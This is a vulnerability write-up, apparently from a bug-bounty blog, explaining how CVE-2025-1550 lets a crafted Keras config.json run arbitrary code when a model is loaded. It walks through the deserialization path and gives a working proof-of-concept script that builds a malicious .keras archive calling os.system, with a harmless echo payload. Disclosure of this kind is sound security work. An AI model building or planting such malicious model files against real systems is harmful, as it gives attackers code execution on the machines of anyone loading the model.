Inside CVE-2025-1550: Remote Code Execution via Keras Models
Apr 29, 2025
By Mevlüt Akçam

Before Google even filed CVE-2025-1550, one of our Huntr researchers, Mevlüt Akçam (aka mvlttt on huntr), quietly unearthed a critical flaw that delivers arbitrary code execution the moment you load a malformed .keras
model—or, astonishingly, even a JSON file. In the post below, they’ll walk you step-by-step through the discovery process and unpack their proof-of-concept.
First Step into the MFV Program: A Review of Keras
While reviewing the MFV program launched by Huntr, I found this research to be a technically meaningful and feasible undertaking, and Keras stood out as a fitting target to evaluate within that framework.
Before starting the work, it is worth examining the program's overall structure and objectives in detail, so that we can understand more clearly what needs to be done and how to set our goals.
Our first goal is to select a machine learning model and manipulate its configuration so that malicious code runs during the loading process. The underlying aim is to evaluate the security vulnerabilities that can arise while a model is being loaded.
Target and Methodology
The main goal of the study can be summarized as follows:
- Selecting a commonly used machine learning model
- Identifying security vulnerabilities in the model loading process
- Investigating whether these vulnerabilities can be used to execute malicious code
In this blog, we'll examine the Keras model format in depth, addressing a vulnerability that could provide remote code execution (RCE) capability during model loading.
Keras Model Structure and Loading Process
When a model is created and saved in Keras, it is stored in a structure consisting of three basic components:
- **config.json**: Contains model architecture and configuration information
- **metadata.json**: Contains metadata information about the model
- **model.weights.h5**: Stores the trained weights of the model in HDF5 format
These three files are compressed with the ZIP algorithm and saved as a single file with a `.keras` extension. Our vulnerability research will focus specifically on the `config.json` file, as the reconstruction of the model structure is based on the content of this file.
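You can see this structure for yourself by saving any model and listing the archive contents. A minimal sketch (the model and file name are just placeholders):

```python
import zipfile

import keras
from keras import layers

# Save a trivial placeholder model, then list what the .keras archive contains.
model = keras.Sequential([keras.Input(shape=(4,)), layers.Dense(1)])
model.save("demo.keras")

with zipfile.ZipFile("demo.keras") as zf:
    print(zf.namelist())                 # expected: config.json, metadata.json, model.weights.h5
    print(zf.read("config.json")[:200])  # the architecture description we will tamper with later
```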
Understanding the Loading Process
Now let's take a brief look at Keras's model loading process, which is initiated with the `load_model` function. This function follows different paths depending on the model type and file extension, but I will skip those branches here and focus directly on the internal path where the model is rebuilt.
When the `_load_model_from_fileobj` function is called, the contents of the ZIP archive are extracted and the rebuilding of the model begins. At this stage, the `config.json` file is examined and the `_model_from_config` function comes into play. After the JSON object is loaded into memory, `deserialize_keras_object` is called to convert the serialized structure back into an object.
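In outline, the chain looks like the sketch below. The function names come from the Keras 3 source, but this is a simplified description rather than the actual implementation:

```python
import keras

# The (simplified) chain that loading a .keras file walks in Keras 3:
#   keras.saving.load_model("demo.keras")
#     -> saving_lib._load_model_from_fileobj()         # opens the ZIP, reads config.json
#     -> saving_lib._model_from_config()               # json.loads the architecture
#     -> serialization_lib.deserialize_keras_object()  # turns the dict back into live objects
#
# The key observation: the model is rebuilt entirely from data inside the archive.
model = keras.saving.load_model("demo.keras")  # "demo.keras" is the placeholder saved above
```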
Identifying Exploitable Sections
When we examine the `deserialize_keras_object` function in detail, two sections stand out once we skip past the less relevant code blocks.
The first: if the `class_name` value read from `config.json` is "function", the `_retrieve_class_or_fn` function is called to resolve it.
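Paraphrased very loosely (this is a sketch of the idea, not the actual Keras source; the real function also handles registered and custom objects), the lookup boils down to an import plus an attribute fetch:

```python
import importlib

# A minimal paraphrase of the primitive that _retrieve_class_or_fn boils down to.
def retrieve(module, name):
    mod = importlib.import_module(module)  # "module" comes straight from config.json
    return vars(mod).get(name)             # and so does "name"

# With class_name set to "function", config.json hands us an arbitrary callable:
fn = retrieve("os", "system")
print(fn)  # <built-in function system> -- but nothing in this branch lets us pass arguments
```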
The module is imported, and the object is looked up and returned. At this point you might think of adding a Python file directly to the Keras archive and importing it. However, when the `.keras` archive is opened, its contents are extracted to a temporary directory, and the Python process that imports Keras will not be able to import a file sitting in that temporary directory.
In this case, we could in principle obtain simple remote code execution (RCE) through `os.system`. However, when I examined whether we could actually call the retrieved object and control its parameters, that turned out not to be feasible through this branch alone.
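For reference, a config entry that reaches this branch and resolves to `os.system` looks roughly like the schematic below. The key names follow the serialization format discussed above, but treat the exact layout as an assumption; it may differ between Keras versions and from the original PoC:

```python
# Schematic config.json entry that resolves to os.system via the "function" branch.
# It gives us a reference to the callable, but this code path alone never invokes it.
function_entry = {
    "module": "os",            # imported via importlib.import_module
    "class_name": "function",  # routes deserialization into the function branch
    "config": "system",        # the attribute looked up on the imported module
    "registered_name": "system",
}
```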
As we continue reading the code, a second section stands out.
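Paraphrased loosely again (a sketch rather than the real source; safe-mode checks and custom-object handling are omitted), the relevant logic looks like this:

```python
import importlib

# Simplified paraphrase of the tail of deserialize_keras_object.
def deserialize_class_sketch(config):
    module, class_name = config["module"], config["class_name"]
    cls = vars(importlib.import_module(module)).get(class_name)  # same primitive as before

    inner_config = config.get("config", {})
    instance = cls.from_config(inner_config)                     # we choose cls AND inner_config

    if "build_config" in config:
        instance.build_from_config(config["build_config"])
    if "compile_config" in config:
        instance.compile_from_config(config["compile_config"])
    return instance
```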
Here, the `_retrieve_class_or_fn` function is called again, and this time a method is actually invoked on the result, with input we can also control. However, despite all my examinations, I could not find an exploitable implementation of `from_config`, `build_from_config`, or `compile_from_config`, with one exception.
When I examined the `from_config` method of the Model class in the `src/models/model.py` file, I saw that the `functional_from_config` method was called.
Examining this method, we see that `process_layer` creates a layer from the `functional_config["layers"]` input. The created layer is then passed to `add_unprocessed_node` (i.e., it is added to the `unprocessed_nodes` list). Afterwards, the layer is called via `process_node`, and its arguments are values that we control. If we can deliver those parameters with the correct types and without them being altered along the way, we will be able to achieve our goal.
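Putting it together, a loose sketch of the `process_layer` / `process_node` flow (not the actual Keras source; layer bookkeeping and node ordering are omitted, and the inbound-node key names are an assumption based on the serialized format):

```python
import importlib

def resolve(entry):
    # stand-in for deserialize_keras_object handling a "function" entry
    mod = importlib.import_module(entry["module"])
    return vars(mod).get(entry["config"])

def functional_from_config_sketch(functional_config):
    for layer_data in functional_config["layers"]:
        layer = resolve(layer_data)                    # process_layer
        for node_data in layer_data.get("inbound_nodes", []):
            args = node_data.get("args", [])           # deserialize_node leaves plain
            kwargs = node_data.get("kwargs", {})       # values untouched
            layer(*args, **kwargs)                     # process_node: the call we abuse
```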
`deserialize_node` converts the `inbound_nodes` values from the config data and also runs them through `deserialize_keras_object`. None of these conversions matter for our purposes at this stage: when we supply plain values, they are returned as-is, without any type conversion.
Crafting the Exploit
Now we can put all the pieces together.
- First, we will create a layer of type `Model`.
- Then, we will define another layer inside this model's config values; this is the layer that will be called during node processing.
- To control the parameters of that call, we will use the `inbound_nodes` key in the config. We will also add a few other keys to prevent errors during loading.
Now we're ready: with this configuration we can create a malicious model, and the whole process can be automated with a short script.
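The original PoC is not reproduced verbatim here. The sketch below uses a harmless `echo` payload and placeholder file names, and the exact set of keys is an assumption based on the serialization format described above, so it may differ from the original exploit and between Keras versions; patched releases reject this kind of configuration outright.

```python
# Sketch of building a malicious .keras archive (placeholder values, harmless payload).
import json
import zipfile

malicious_config = {
    "module": "keras",
    "class_name": "Model",            # Model.from_config -> functional_from_config
    "config": {
        "name": "exploit_model",
        "layers": [
            {
                "module": "os",                # imported via importlib
                "class_name": "function",      # resolved through the "function" branch
                "config": "system",            # -> os.system
                "registered_name": "system",
                "name": "payload",
                "inbound_nodes": [
                    {"args": ["echo pwned > /tmp/keras_poc"], "kwargs": {}}
                ],
            }
        ],
        # extra keys kept minimal: the payload fires while the layers are processed,
        # before the rest of the functional graph is validated
        "input_layers": [],
        "output_layers": [],
    },
}

with zipfile.ZipFile("malicious.keras", "w") as zf:
    zf.writestr("config.json", json.dumps(malicious_config))
    zf.writestr("metadata.json", json.dumps({"keras_version": "3.8.0"}))  # minimal stand-in metadata
    # an empty weights entry is enough for a demo: code execution happens while
    # config.json is deserialized, before the weights are ever read
    zf.writestr("model.weights.h5", b"")
```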
Now let's load this model and trigger the vulnerability.
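On a vulnerable Keras release, simply loading the archive fires the payload (a minimal sketch, reusing the file name from the script above):

```python
import keras

# On an unpatched install, the payload executes while config.json is being
# deserialized, before any weights are loaded.
keras.saving.load_model("malicious.keras")
```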
Awesome, right? We can now trigger arbitrary code execution (ACE) with a valid model, and this was in fact a 0-day vulnerability that was later assigned a CVE. What makes it even more dangerous is that the `config.json` file alone can be loaded with `model_from_json` to achieve ACE; the `.keras` archive isn't needed at all.
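For illustration, something along these lines is enough on a vulnerable version (this sketch reuses the `config.json` from the archive built earlier):

```python
import json
import zipfile

import keras

# No archive required: the bare architecture JSON goes through the same
# deserialization path.
with zipfile.ZipFile("malicious.keras") as zf:
    config_json = zf.read("config.json").decode("utf-8")

keras.models.model_from_json(config_json)
```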

Final Thoughts
Thanks for following along on this vulnerability discovery journey. Stay tuned for more insights and security research from our community, and happy hunting!